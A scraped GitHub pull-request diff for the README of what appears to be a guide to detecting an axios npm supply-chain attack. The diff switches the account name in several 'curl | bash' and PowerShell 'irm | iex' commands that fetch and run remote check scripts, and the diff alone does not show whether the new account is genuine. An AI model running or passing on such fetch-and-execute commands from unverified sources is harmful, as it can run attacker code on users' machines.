Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
8 changes: 4 additions & 4 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -25,17 +25,17 @@ npm list -g axios

**Mac/Linux:**
```bash
curl -sL https://raw.githubusercontent.com/networkchuck/axios-attack-guide/main/check.sh | bash
curl -sL https://raw.githubusercontent.com/thenetworkchuck/axios-attack-guide/main/check.sh | bash
```

**Windows (PowerShell):**
```powershell
irm https://raw.githubusercontent.com/networkchuck/axios-attack-guide/main/check.ps1 | iex
irm https://raw.githubusercontent.com/thenetworkchuck/axios-attack-guide/main/check.ps1 | iex
```

Or clone and run locally:
```bash
git clone https://github.com/networkchuck/axios-attack-guide.git
git clone https://github.com/thenetworkchuck/axios-attack-guide.git
cd axios-attack-guide
./check.sh # Mac/Linux
.\check.ps1 # Windows PowerShell
Expand Down Expand Up @@ -201,4 +201,4 @@ Both package managers do **NOT** run lifecycle scripts by default. This attack w

---

Made with coffee by [NetworkChuck](https://youtube.com/networkchuck)
Made with coffee by [NetworkChuck](https://youtube.com/thenetworkchuck)